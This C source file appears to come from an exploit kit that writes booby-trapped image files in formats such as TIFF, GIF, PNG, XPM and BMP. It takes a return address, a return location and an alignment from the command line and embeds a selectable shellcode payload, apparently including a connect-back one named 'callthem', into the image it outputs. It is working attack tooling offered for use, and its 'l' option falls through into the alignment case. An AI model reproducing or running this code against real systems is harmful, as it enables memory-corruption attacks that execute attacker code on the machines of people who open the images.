#include "ximage.h"
#include "payloads.h"


/* for filling in array of structures below */
#define xcreate(image_type) \
{   \
filetype: #image_type, \
filename: OUTFILE,    \
init: ximage_##image_type##_init,   \
clean: ximage_##image_type##_clean, \
set_payload: ximage_set_payload, \
fill: ximage_##image_type##_fill,    \
write: ximage_write \
}

/* the different image types offered */
static ximage_t    eximages[] = 
{
    xcreate(tiff), xcreate(gif), xcreate(png), xcreate(mrf),
    xcreate(pnm), xcreate(other_gif), xcreate(pcx),
    xcreate(xpm), xcreate(other_xpm), xcreate(prf), 
    xcreate(bmp),
};
#define NUM_IMG_TYPES (sizeof(eximages) / sizeof(eximages[0]) )


/* create a new copy of an ximage */
ximage_t * ximage_clone(ximage_t *xp)
{
    ximage_t    *t = NULL;

    t = calloc(1, sizeof(*xp));
    if(t == NULL)
        die("calloc");
    memcpy(t, xp, sizeof(*xp));
    return t;
}


/* find an image type handler */
ximage_t * ximage_bind(char *image_type)
{
    int x = 0;

    for(x = 0; x < NUM_IMG_TYPES; x++){
        if(strcmp(eximages[x].filetype, image_type) == 0)
            return ximage_clone(&eximages[x]);
    }
    return NULL;
}


/* bind image handler, and setup exploit parameters */
ximage_t * ximage_parse_args(int argc, char **argv)
{
    int     c = 0,  align = 0;
    u_long  retaddr = 0, retloc = 0;
    char    *filename = NULL, *payload = NULL, *image_type = NULL;
    ximage_t    *xp = NULL;

    /*
     * -r retaddr
     * -l retloc
     * -a align
     * -t exploit type: ...see usage()
     * -f output file
     * -p payload type: 'callthem | blk_sig_callthem' 
     */ 
    while ((c = getopt(argc, argv, "r:l:a:t:f:p:")) != -1) {
	    switch (c) {
            case 'r':
                if(sscanf(optarg, "%lx", &retaddr) != 1)
                    die("sscanf");
                break;
            case 'l':
                if(sscanf(optarg, "%lx", &retloc) != 1)
                    die("sscanf");
            case 'a':
                align = atoi(optarg);
                break;
            case 't':
                image_type = optarg;
                break;
            case 'f':
                filename = optarg;
                break;
            case 'p':
                payload = optarg;
                break;
	        case ':':
	        case '?':
	        default:
                return NULL;
	    }
    }
    /* make sure we got what we need */
    if(align < 0 || align > 3 || retaddr == 0 || retloc == 0 
            || image_type == NULL)
        return NULL;

   
    /* select an image handler object, polymorwho */
    if( (xp = ximage_bind(image_type)) == NULL){
        fprintf(stderr, "Bad image type %s\n", image_type);
        return NULL;
    }

    /* fill in exploit params, set payload */
    xp->retloc = retloc;
    xp->retaddr = retaddr;
    xp->align = align;
    ximage_set_payload(xp, payload);
    if(filename)
        xp->filename = filename;

    return xp;
}


/* write out an image buffer to a file */
int ximage_write(ximage_t *xp)
{
    int fd, n = 0, n2w = 0, nr = 0;
    char    buf[BS];

    if(xp->buf == NULL)
        return 1;

    snprintf(buf, BS, "%s.%s", xp->filename, xp->filetype);

    fd = open(buf, O_CREAT|O_WRONLY, 0644);
    if(fd < 0)
        die("open");

    n = nr = 0;
    n2w = xp->buflen;
    while(n2w){
        n = write(fd, xp->buf+nr, n2w);
        if(n < 0)
            die("write");
        n2w -= n;
        nr += n;
    }

    close(fd);

    return 0;
}


/* set the exploit payload to be delivered with image */
int ximage_set_payload(ximage_t *xp, u_char *payload_name)
{
    int x;

    /* default to type 0 */
    xp->payload = payloads[0].code;

    if(payload_name == NULL)
        return 1;

    /* search for a match */
    for(x = 0; x < NPAYLOADS; x++){
        if(strcmp(payloads[x].name, payload_name) == 0){
            xp->payload = payloads[x].code;
            break;
        }
    }
    if(x == NPAYLOADS)
        fprintf(stderr, "Couldn't find payload type %s\nUsing default %s\n", 
                                payload_name, payloads[0].name);

    return 0;
}
